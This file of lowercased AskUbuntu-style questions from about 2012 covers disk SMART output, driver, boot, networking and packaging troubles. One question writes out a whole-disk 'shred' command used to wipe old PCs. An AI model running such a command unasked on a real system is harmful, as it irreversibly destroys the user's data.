self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 120 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 103 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 050 pre-fail always - 0 2 throughput_performance 0x0005 100 100 050 pre-fail offline - 0 3 spin_up_time 0x0027 100 100 001 pre-fail always - 1206 4 start_stop_count 0x0032 100 100 000 old_age always - 5171 5 reallocated_sector_ct 0x0033 100 100 050 pre-fail always - 736 7 seek_error_rate 0x000b 100 100 050 pre-fail always - 0 8 seek_time_performance 0x0005 100 100 050 pre-fail offline - 0 9 power_on_hours 0x0032 096 096 000 old_age always - 1726 10 spin_retry_count 0x0033 202 100 030 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 1208 191 g-sense_error_rate 0x0032 100 100 000 old_age always - 15 192 power-off_retract_count 0x0032 100 100 000 old_age always - 89 193 load_cycle_count 0x0032 098 098 000 old_age always - 24439 194 temperature_celsius 0x0022 100 100 000 old_age always - 42 ( min/max 18/48 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 14 197 current_pending_sector 0x0032 100 100 000 old_age always - 0 198 offline_uncorrectable 0x0030 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 220 disk_shift 0x0002 100 100 000 old_age always - 49 222 loaded_hours 0x0032 097 097 000 old_age always - 1362 223 load_retry_count 0x0032 100 100 000 old_age always - 0 224 load_friction 0x0022 100 100 000 old_age always - 0 226 load-in_time 0x0026 100 100 000 old_age always - 297 240 head_flying_hours 0x0001 100 100 001 pre-fail offline - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 short offline completed without error 00 % 1726 - # 2 short offline aborted by host 60 % 1726 - # 3 short offline completed without error 00 % 1714 - # 4 short offline completed without error 00 % 1707 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . new i have found another issue . the result of # hdparm -tt /dev/sda is different in installed system and livecd livecd : timing cached reads : 2630 mb in 3.00 seconds = 878.32 mb/sec timing buffered disk reads : 218 mb in 3.00 seconds = 72.62 mb/sec installed system timing cached reads : 2 mb in 3.37 seconds = 607.20 kb/sec timing buffered disk reads : 218 mb in 3.00 seconds = 72.62 mb/sec
163372	how to completely remove ubuntu 12.04 after restoring computer to factory settings ?	i have reset my computer to factory settings ( without knowing that ubuntu will not be uninstalled ) . after setting up , ubuntu was still listed at the start up boot manager , when i selected it , it gave me errors . ubuntu 12.04 also stole my 18gb hard drive . now , i canât find ubuntu uninstaller in my programs nor i canât find ubuntu files in my c drive . by the way , i installed ubuntu 12.04 with wubi installer . how do i completely remove ubuntu from my computer ? please help me fix this problem .
163373	how do i allow more than one user to read the output and enter commands for a program running in the terminal remotely via ssh ?	i 've looked around and i 've seen that some people recommended using screen , but i do n't exactly know what they meant . the program in question is a minecraft server . i need it to be able to allow multiple people look at the console and enter commands . each person will have a user account . the server jar is inside a directory inside the root directory ( but not in a home folder ) and everyone in a certain group will be able to have read and write permissions to the folder in which the server is held in . i have tried rcon , and it seems like it does not work at the moment . any help would be appreciated . so , in short : have multiple people with different user accounts let more than one user access the console at a time let the user read and write ( commands ) to the console if possible , on connection , display all messages from the server from that session 's ( session being from when the server jar was started ) start . thanks !
163376	resolve specific ip addresses to localhost in 12.04	i used to simply add static dns entries in my /etc/hosts file . this is not working with 12.04 . how does one add static dns entries in 12.04 ?
163384	i can not start graphical apps as root	i used to be able to do so , but something as simple as this fails now : gksudo gedit and this also fails : sudo gedit i receive the error : can not open display . i haved checked this : .xauthority and .iceauthority have my user as owner and also read/write permissions as both files are binary , i can not understand them and check if they are corrupted probably , i have some misconfiguration . i have read this before and many other guides before asking . i 'm using ubuntu precise 12.04 64-bit .
163390	ubuntu not showing any gui	when i boot into ubuntu , i do n't see the unity interface . instead it boots into some sort of command line interface ( pic attached ) i tried pressing atl + f7 , in that case i get a screen showing this : ubuntu was working properly before . i am using propriety graphics drivers from ati . link to graphics driver . the problem surfaced after i ran software update yesterday . i 'm sorry for the bad quality screenshots . i am not sure how to take screen grabs in this situation . `` if '' this is caused because of me using the propriety graphics drivers , how do i solve it ? or else , what else can possibly be the issue ?
163393	unable to install ubuntu on toshiba sattelite after download interrupted	while trying to replace vista on my laptop with ubuntu via a boot disk , someone unplugged the computer and the installation was interrupted . i tried shutting down the pc and restarting , but found that not only was the pc giving me the `` no os '' screen , but refused to load any ubuntu disks . is there anything i can do to re-install ubuntu ?
163401	issue enabling/installing hardware acceleration for ati radeon 6600m on precise ( 12.04 )	i have recently bought a lenovo thinkpad which comes with an ati radeonhd 6600m gpu . i believe i have successfully installed catalyst/the fglrx drivers by following the instructions at http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide # removing_catalyst.2ffglrx to the letter . the results of running the command fglrxinfo are as follows : $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon 6600m and 6700m series opengl version string : 4.2.11733 compatibility profile context these results , to me , suggest that i have successfully installed the driver . to enable hardware acceleration , the instructions tell me i need to install the xvba-va driver . as such , i input the lines : sudo apt-get install xvba-va-driver libva-glx1 libva-x11-1 vainfo vainfo the output of vainfo is as follows : libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit which is nothing like as suggests on the instructions or the other websites i 've checked ( which include askubuntu and the ubuntu support pages ) . i have also followed the instruction about creating a link . i get the following output when inputting the command : ln : failed to create symbolic link `/usr/lib/x86_64-linux-gnu/dri/fglrx_drv_video.so ' : file exists this to me suggests the link is not the issue . any ideas ? thanks for any/all help provided !
163403	is it possible to do calculation in unity interface ?	is it possible to do maths in unity interface , after hitting the alt key ?
163405	make my ubuntu 12.04 laptop visible on the network	i 'm ecstatically happy with my 12.04 on my laptop after loading it over my ms vista ... but there 's just one thing , one little fly in the ointment ... . while i can view our 2 terabyte , shared hard-drive in the lounge ( and copy files back and forth ) i ca n't see my pc ( when i boot up in ubuntu 12.04 ) nor the lubuntu computer connected to the tv ( for movies , youtube etc ) . printing to the hp office jet on the pc doesnt work over the network either . have had one dubious flirtation with samba , which seems to be the only thing i 've found that will 'work ' , however halfway through that `` installation '' everything just ground to a halt , the directions began to stop making sense ... i was working from this page . our network consists of the following : our internet service is wirelessly sent to us from our provider to our dish on a pole . it comes into the house via an ethernet cable . we split it there to a phone , and to 6 other destinations ( bedrooms , computers , and to another splitter in the lounge which has a wifi antennae and 4 ethernet ports ) . one port goes to the lubuntu os pc which is connected to the tv the second port goes to the 2 terabyte harddrive ( ms powered 'mybooklive ' ) ( the other two are empty ) my ubuntu 12.04 laptop connects wirelessly to this splitter in the lounge . i know just enough about computers to get myself into an awful mess without too much trouble we usually can view friends ' laptops when they get on our network ( as they are invariably ms os 's ) our flatmate , who introduced us to linux 's computer is also invisible how can we make our linux os based computers visible on the network and share files and printing ?
163408	how to install a `.deb` package , when the install button is disabled ?	i am trying to install this deb package http : //packages.ubuntu.com/precise/utils/b43-fwcutter but whenever i doubleclick it the install button is disabled . i do n't have internet connection .
163413	shotwell bugs with a canon powershot a3100 is	well , i have a canon powershot a3100 is , and i have some problems while importing videos . when i try to copy them , it simply does n't work , and when i try to import them , it starts buging , and the system does n't respond anymore . does anyone know a better software for importing videos/pictures from a camera , or do i need to install a driver ? thanks .
163422	how can i remove linux from a laptop	recently , i installed linux on my dad 's computer , but now he wants it removed . how can i remove it , and get windows xp back ? or at least set windows xp as default boot os ? i need this as soon as possible .
163427	grub is not detecting my partition	i have following partition in my hdd /sda1 ntfs 14gb /sda2 ntfs 14gb boot ( windows7 installed here ) /sda3 extended /sda5 ntfs 100gb /sda6 ext4 5gb root /sda7 ext4 2gb swap /sda8 ext4 13gb home after installing ubuntu 10.4.x it is showing only no such parttion grub rescue > what to do ?
163428	is there a way to set/change proxy in synaptic package manager from terminal ?	i want to change proxy settings of synaptic package manager from terminal . i see that editing /etc/apt/apt.conf file does not work , i.e. , even if i change proxy settings here , or anywhere , synaptic package manager wo n't use it . basically , i dont want to go everytime inside the settings of spm to change the proxy . i want to make a small script which will do this job . does anyone know in which file are the proxy credentials of synaptic package manager ( spm ) is stored ?
163429	error when installing oracle-java7-installer	i 'm trying to install java 7 on my ubuntu 12.04 . but everytime i try , it always shows error like below . this is when i 'm trying to upgrade even when the java 7 is not installed harits @ harits-ubuntu : ~ $ sudo apt-get upgrade [ sudo ] password for harits : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : oracle-java7-installer 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/15.3 kb of archives . after this operation , 3,072 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-07-14 17:53:46 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 111.94.254.10 , 111.94.254.17 connecting to download.oracle.com ( download.oracle.com ) |111.94.254.10|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-07-14 17:53:46 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 184.51.118.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |184.51.118.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-07-14 17:53:47 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |111.94.254.10|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % 95.1m=0s 2012-07-14 17:53:47 ( 95.1 mb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) harits @ harits-ubuntu : ~ $ can somebody tell me how to fix this problem ?
163434	gnome on ubuntu 12.04	i 'm using ubuntu 12.04 i cant install gnome 3 on it . i want it to look like version 10.04 or 9.04 . can someone tell me how to do it ?
163435	ubuntu 10.04 lts vs 12.04 lts performance comparison	can you tell me more about performance comparrison between 10.04 and 12.04 . is 12.04 much resource hungry ? i have pentium 4 2.8 ghz , 1.5 gb of ram and nvidia geforce fx 5500 . is that enough for smooth ubuntu 12.04 .
163437	tried to play a full screen game , now system will not boot	recently i installed ubuntu 12.04 gnome shell remix 64bit on my desktop , everything was going great on it . i installed all of the most recent updates , installed some software as well as the latest amd graphics driver 12.6 . everything worked perfectly , i had rebooted the system several times switching back and forth between windows 7 . the issue began when i installed cube 2 : sauerbraten . the game played nicely until i changed to fullscreen , then the resolution changed to 640x480 , even though i set it to 1920x1080 . the system became entirely unresponsive , i hit `` ctrl-alt-f2 '' and logged in and `` sudo service lightdm stop '' and `` sudo service lightdm start '' but it returned me to an all blue screen . i finally reboot the computer but now immediately after the bios i see the grub menu where i have the option of booting kernel 3.2 the 3.2 recovery mode and windows 7 . chosing to boot kernel 3.2 sends me back to the blue screen , but the recovery does work and shows the usual options . how can i go about restore my system , i have found many similar solutions on this site but none make a difference .
163439	is there an alternative to adobe flash ?	i am having problems with adobe flash . i have the latest version installed for firefox . it keeps crashing my computer and i was wondering if there was any alternative that works with videos that require an updated flash . if there is n't an alternative , is there any software that keeps flash stable ? another problem i have is that even though i updated my flash , some videos say that my flash is n't updated . i know flash is pretty rubbish in linux and osx . is there any alternative for flash ? is gnash any good ? is it still supported and developed ? please help .
163444	what happens if rsnapshot / rdiff-backup gets interrupted in the middle of a transfer ?	what happens if rsnapshot or rdiff-backup gets interrupted in the middle of a transfer ? i know that rsnapshot tries to make a complete snapshot of your system in rotating fashion , and rdiff-backup makes a differential backup , which is going to be based on the files previously saved behind it . so : what happens if it gets interrupted in the middle ? does this result in an `` incomplete snapshot '' ? will other snapshots which are dependent on this one be corrupted ? ( surely not , but ... ? ... i am new to backup systems . ) furthermore , i have set this up on a laptop to be backed up from home server , when i 'm at home on home network , so there should be lots of opportunities for the server to not get a chance to finish the transfer before ending the connection . ( this is an on ubuntu server . )
163445	how do i boot ubuntu from the network without installing ?	the scenario : at work i have to shred data on old pcs ( not my main responsibility ) . what i do is i boot from the live-cd , choose try ubuntu , open the terminal and sudo shred -v -n10 /dev/sda . this way the whole thing takes about five minutes and then i let it run until my shift ends . sometimes i have over 20 pc 's a day so i would like to skip the cd burning/changing . also some of the dvd drives do n't work . usb 's are n't really a solution , i can not request 25 usb sticks . is there a way to boot ( not install , same thing like try ubuntu without installing ) from network a.k.a . pxe ? my vision is to setup a pxe server , connect it to a 24 port switch and attach the clients to the switch . i managed to setup a pxe server to install windows or ubuntu , but what i really need is to be able to just boot the try-ubuntu-method over the network . full install takes too long and is unnecessary . any ideas ?
163448	fixing 800x600 resolution in toshiba nb510 ( gma 3650 ) with vesa driver	after installing ubuntu 12.04 on a toshiba nb510 the screen resolution is 800x600 instead of the native 1024x600 . this is a netbook that contains the infamous gma3650 ( aka powervr sgx5450 ) which is poorly supported by the linux kernel . i 've looked around and tried several different solutions . namely : i 've tried installing a newer kernel ( 3.3+ ) , since some people have reported success with it . that did n't seem to fix the resolution problem . i 've tried installing an older version of ubuntu ( 10.04 ) , since someone suggested there 's an older driver that should provide basic support for the card , but the livecd image would n't boot . i 've tried using this ppa . on first reboot , the screen resolution was correct . subsequent reboots lead to a blank screen immediately after grub . i 've tried passing the kernel option video=1024x600 with the above ppa , to no avail . i 've tried installing a daily build of quantal . the live image boots with the correct resolution . the installed system boots to a blank screen . the video=1024x600 option does n't work here either . on quantal i 've blacklisted the gma500_gfx driver to force the use of vesa . this causes ubuntu to boot into a 800x600 resolution . after this , i 've tried using the following xorg.conf : section `` device '' identifier `` card '' driver `` vesa '' endsection section `` monitor '' identifier `` panel '' modeline `` 1024x600_ddc '' 54.03 1024 1048 1184 1344 600 603 609 670 -hsync -vsync option `` preferredmode '' `` 1024x600_ddc '' endsection section `` screen '' identifier `` screen '' device `` card '' monitor `` panel '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1024x600_ddc '' endsubsection endsection where the modeline comes from ddc , as reported in /var/log/xorg.0.log . this seems to have no effect , with the resolution stuck at 800x600 . additionally , adding nomodeset to the kernel command line does not help with either the resolution problem or the blank-screen problem . ideally , since i do n't think i can trust the gma500_gfx driver or that from meego ( the one in sarvatt 's ppa ) , i would like to use the vesa driver ( probably reverting to 12.04 ) , and specify the resolution in a xorg.conf file , but i ca n't seem to get this to work . any ideas ? btw , this is a problem i 'm helping a friend with , i do n't have direct access to the machine .
163450	how do i setup ubuntu to boot in the morning and play music ?	is there a way to boot my computer in the morning and play music without turning it on ? it 's not that easy to find anything on google because i do n't have problems with booting . i 'd rather like to improve the way my computer boots .
163455	how do i install 4shared ?	my linux is edubuntu 12.04 lts . after downloaded & installing successfully `` desktop4shared-1.3_1-all '' package , 4shared does n't work on my platform .
163456	how do i install the video driver on an asus n56v ?	on a fresh installation of kubuntu 12.04 amd64 on a asus n56v jockey-kde says that there are no useful prprietary drivers . using the info-center i can see in pci an nvidia non-vga unclassified device ( 0x00 ) in opengl an intel ivy bridge graphics controller ======================================================================= i 've found that the 3.2 kernel is missing many kernel modules for the asus n56v machine and other ivy-bridge machines . the machine is also overheating . i 'm closing this thread and i 'll start a new one after installing 12.10 alpha 2 that uses a 3.5 kernel =======================================================================
163457	how to hide users from the user account list of the login screen in ubuntu 12.10 ?	i want to hide users from login screen . i have tried to modify a file in /etc/gdm , but that folder does n't exist in my file system . any idea ?
163461	sound has crashed on my system	i was listening to music on my laptop ; suddenly sound stopped coming ; tried restarting the laptop several times . sound is still not working ; please suggest what to do . player : i have tried : rhythm player ; smplayer and vlc . ubuntu version : 12.04 lts
163465	trouble when installing 32-bit packages on a 64-bit system	i 've recently re-installed my system as 64-bit , and am currently trying to get the android sdk up . one of the packages required is libsdl1.2debian : i386 . trying to naively install this caused apt-get to try and uninstall most of the os . eventually i figured out , with some careful aptitude work , that the problem can be solved by downgrading a point-release on the 64-bit libasound2 and libgcrypt11 packages . for example , the version of libasound2 installed was 1.0.25-1ubuntu10.1 , whereas the latest : i386 version was 1.0.25-1ubuntu10 . now , when trying to update my system , it claims everything is up-to-date , and there is no sign of the newer packages ... what 's going on ? this should be handled better in some way ...
163468	can i install ubuntu withing windows ?	i 'm new to ubuntu . i want to install and try learning it . do i need to format my pc and create another partition on my hard disk ? i only have one partition c : and i do n't want to format the pc and lose any data . can i install ubuntu on the same drive or partition that windows is installed on ( without uninstalling windows ) ?
163471	how to get default xorg.conf back ?	i accidentally modified my /etc/x11/xorg.conf file . can i just delete it or i am toasted ? is there anything i should be worried about . i 'm not having any issue except the twitchy/shaky touchpad . i have a dell inspiron n4050 . how can i get my default xorg.conf back ? and if possible how can i remove the twitchy/shaky touchpad ? i saw a lot of threads regarding this issue but i could not get the solution to it . thanks
163475	how to create disk image/clone	i am not sure what is the difference between image and clone but i have just installed fresh system on my laptop and i would like to have a copy if it so in time when i format the disk i could easily restore the system and its settings from dvd . what could you recommend to do ?
163476	i ca n't access my device partitions ?	i ca n't access my files in other partitions even if i mounted them by mount /dev/sda12 ? how can i solve this problem ? on using cat /etc/fstab /etc/mtab i got the following output . /etc/fstab : static file system information . use 'blkid -o value -s uuid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . file system mount point type options dump pass proc /proc proc nodev , noexec , nosuid 0 0 /dev/sdb5 / ext4 errors=remount-ro 0 1 swap was on /dev/sdb11 during installation uuid=c0f5af91-01c4-4a4a-8700-b03afbe2898a none swap sw 0 0 /dev/sda5 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 none /lib/init/rw tmpfs rw , nosuid , mode=0755 0 0 and for fdisk -l i got the following output : disk /dev/sda : 320.1 gb , 320072933376 bytes 84 heads , 59 sectors/track , 126138 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x005c005c device boot start end blocks id system /dev/sda1 * 59 52097471 26048706+ 7 hpfs/ntfs/exfat /dev/sda2 52099127 625134971 286517922+ f w95 ext 'd ( lba ) /dev/sda5 52099129 81399910 14650391 83 linux /dev/sda6 104195003 208384931 52094964+ 7 hpfs/ntfs/exfat /dev/sda7 208384991 312574919 52094964+ 7 hpfs/ntfs/exfat /dev/sda8 312574979 416764907 52094964+ 7 hpfs/ntfs/exfat /dev/sda9 416764967 520954895 52094964+ 7 hpfs/ntfs/exfat /dev/sda10 520954955 625134971 52090008+ 7 hpfs/ntfs/exfat /dev/sda11 81401856 84664319 1631232 82 linux swap / solaris /dev/sda12 84666368 104194047 9763840 83 linux partition table entries are not in disk order
163481	where is the screenshot ?	i pressed prtsc , saw a flash and heard a shutter sound but no screenshot file saved in ~/pictures . however , if i take the screenshot via the terminal or using the gnome-screenhot gui , a dialog box appears prompting me to choose a location to save the screenshot . i am using unity in ubuntu 12.04 . according to this bug report , a fix has been released for the no dialog box issue , but where is the fix ? i see neither a dialog box nor the screen-shot . my system is completely up to date , i have activated even the pre-released and unsupported update repositories .
163483	no sound or sound card not detected in dell precision workstation t7400	i have got ubuntu 10.04 server edition running on a dell precision t7400 workstation with an intel sound card intel [ hda intel ] , device 0 : ad198x analog [ ad198x analog ] and i am trying to get the sound working on the system , but the sound is not working . on typing lspci at the prompt , all i get is this
163488	wifi not working if starting or waking up from suspend on battery power	all , i have a fresh install of ubuntu 12.04 32 bit on a lenovo x220 . i 've bought this model on purpose as the hardware is known to perform well in 11.10 64 bit ( see here ) and indeed i did not have any issues so far but the one below . if i start the laptop or i wake it up from suspend and i am running on battery power , the wifi network does not work . oddly enough , i do get the popup saying i connected successfully to my home 's wifi , and i get a correct ip address from the dhcp on my home 's access point ( what i can see from ifconfig -a ) but the network is dead , i ca n't even ping the access point . this is what i see , that is identical to when the network works . giacecco @ giaceccos-x220 : ~ $ ifconfig -a ( ... ) wlan0 link encap : ethernet hwaddr 8c:70:5a:3e : f1:80 inet addr:192.168.1.24 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :8e70:5aff : fe3e : f180/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:87965 errors:0 dropped:0 overruns:0 frame:0 tx packets:108083 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33751259 ( 33.7 mb ) tx bytes:111481622 ( 111.4 mb ) giacecco @ giaceccos-x220 : ~ $ ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.1.1 ping statistics -- - 77 packets transmitted , 0 received , 100 % packet loss , time 76608ms to make it work again i have noticed that it is sufficient to disable and enable wireless networking ( not networking in general ) from the global menu bar . the issue can not be reproduced by doing the same when plugged in , or using an ethernet cable . following the instructions here i have also amended the laptop 's radio settings to be the correct ones ( gb in my case ) . below is the output of lshw -c in case it was useful . giacecco @ giaceccos-x220 : ~ $ sudo lshw -c network [ sudo ] password for giacecco : *-network ( ... ) *-network description : wireless interface product : centrino advanced-n 6205 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 34 serial : 8c:70:5a:3e : f1:80 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-26-generic-pae firmware=17.168.5.3 build 42301 ip=192.168.1.24 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:44 memory : f2400000-f2401fff *-network disabled ( ... ) this is incredibly annoying , as i am such a little step to have the perfect linux laptop . as a start , can you suggest what exact script is behind the `` enable networking '' menu item , and how its behaviour could change depending when being on battery power ? thanks .
163492	liveusb does not work	i made a liveusb stick by following the instructions from this site . i booted to the liveusb with my other pc and got the ubuntu installation screen with the following options : run from usb , install to hard disk , test memory , boot from first hard disk , advanced options and help it gives me 5 seconds to choose before it just boots from usb but if i hit any key , it freezes so i just let it run out of time and then it gives me a black screen that says loading : /casper/vmlinuz ... ... .. loading /casper/initrd.lz ... ... ... .ready i do n't know what to do . pressing any key does not work . it 's not loading or going anywhere . i 'm not sure what i did wrong . please help . it can be booted from a fdd witch it where it pops up it recanizes the usb it just keeps giveing me the same freezing problem maybe im doing it wrong , i open the burner click on umbutu 12.04 then on the umbutu rar and then burn it to the usb then pop it in go to my boot manager and click on fdd to opening it it gets to a sreen with options on it but if i hit anything it freez i havent try to md5sum check it yet .
163494	can i uninstall compiz and metacity on 12.04 ?	i kind of new to linux and do n't know much about window and desktop managers and that 's why i am getting confused . since ubuntu 12.04 relies on unity , why are there so much gnome lib file and settings present when viewed through synaptic package manager ( i 'm viewing currently installed ones ) also while browsing the software center i saw compiz and metacity there , why are they there and can i uninstall them ? ( what is unity by the way ? ) .
163496	ubuntu from usb stick wo n't work	i 'm relatively new to linux and am trying to put linux my hp netbook . since i 'm trying to install it on a netbook i have to use the usb method of partitioning my hard drive . so i have downloaded ubuntu 12.04 and put it on to my usb drive with various different live usb creators , linuxlive usb creator , and unetbootin for example and all arrive at the same issue . after the live usb has been created i power down and then start up my computer and go to bios and tell it to load from the usb instead of the hard drive and it displays about two lines that seem like copyright information , but it 's hard to tell they are on screen for about 2 seconds and then the screen goes blank and a flashing cursor ( _ ) is in the upper left corner . i 've left it here for about an hour thinking it might be slow but nothing has changed . i thought it might be the usb that was the issue so i put it in another computer ( laptop but not netbook ) and that booted up and loaded the ubuntu menu just fine , so my thought is that the problem stems from it being a netbook . i do n't get to any ubuntu menu at all so i ca n't change any settings , so i am at a loss for what to do . any ideas ? edit : some system specs : model : hp mini 210-2000 , processor : intel atom cpu n550 , 2 gb ram display adapter : intel graphics media accelerator 3150 . thanks , ian
163499	how to turn off `` automatic display of contents '' feature when a usb stick is attached	i know it 's something quite minimal but i do n't really like it when every time i insert a usb stick , the contents of the drive are immediately displayed in a `` splash-like '' way . how do i turn this off or at least have it as an option ?
163501	ati or nvida for my ubuntu machine ?	i have an ati hd 5870 card . drivers in 12.04 are so slow , they are pointless . in fact i have tried all sorts of configuration and have fallen back to ubuntu 2d which is usable but not that quick . chrome canvas performance in windows 7 trounces that of ubuntu which is quite shocking as i paid quite a lot of money for the card a couple of years ago and i thought the drivers would be there by now . so , i 'm thinking about upgrading to an nvidia gtx680 card but before i shell out âł500 i wanted to know whether it works well in ubuntu 12.04 . i have been reading that ati are being kinder to the linux desktop than nvidia at the moment . how can this be ? edit : i specifically would like to hear from people who moved from ati to nvidia for similar reasons and about their experience . thank you .
163503	how do i make kile work with tex live 2012 ?	since i was not happy about the choice of texlive 2009 from ubuntu repositories , i installed texlive 2012 manually from the website . secondly , i like kile to write , but when i try to install it , it forces me to install all the packages that i want to avoid ( 2009 version ) . so i used equivs and made a dummy ubuntu package that tricks the os ( ubuntu 12.04 64-bit ) into installing kile without those packages . the problem is that kile refuses to compile . when i try to do it , from the output i can see that he does : cd into the right directory executes the pdflatex command and that 's it . the funny thing is that repeating the same exact command via the terminal , the file is compiled correctly ( i updated correctly the path , after all ) . any ideas on how can i get it to work again ?
163507	can not right click with synaptics touchpad	i have a sony vaio e14 . the touchpad detects all clicks as left clicks . in windows 7 , pressing on the right side of the touchpad is recognised as a right click . how can i enable right clicking ? greg @ greg-sve14a1c5e : ~ $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] ... greg @ greg-sve14a1c5e : ~ $ grep `` touchpad : buttons : '' /var/log/xorg.0.log [ 23.112 ] ( -- ) synaptics : synps/2 synaptics touchpad : buttons : left double triple
163513	application view in glade differs from actual application	i used quickly and glade to create an application for ubuntu . quickly create ubuntu-application securelogin via the glade hierarchy section , i removed all the menus except for 'help > contents & about ' . it looks like this ( in glade ) : http : //i442.photobucket.com/albums/qq142/nanieke/3c4663ed.png but when i run the program ( via quickly run or after installing the package ) , suddenly two other options appear in the menu : http : //i442.photobucket.com/albums/qq142/nanieke/15914525.png i ca n't find the content anywhere and do n't know where it is created . the options are not shown in the menu 'hierarchy ' section in glade . i searched my project folder for terms like 'online ' and 'translate ' , but got no results . does anyone have an idea where the options come from and how i can delete them ?
163515	how do i disable or undo the launcher autohide setting ?	i set my launcher settings to auto hide , and now i ca n't seem to find anything . i need to restore the default setting for the launcher . the settings menu doesnt seem to have a way to restore .
163517	which is the x display driver for the amd radeon hd series in 12.04 ?	i 'm looking for the amd open source drivers for the hd series like my hd6250 , but i ca n't find this drivers in the official repository , this package xserver-xorg-video-radeonhd is simply not available in the repos .
163518	file path after installation	i am using quickly ide and i am having trouble with filepath . where to put additional files required by application ? when i put additional files in /data/ folder after application is installed what will be new path ? is it stored in /opt/extras.ubuntu.com/projectname/share or in /usr/share/ ? according to app showdown rules it must be in opt . application will need root permission to write in its files ? how to access file paths inside python code ?
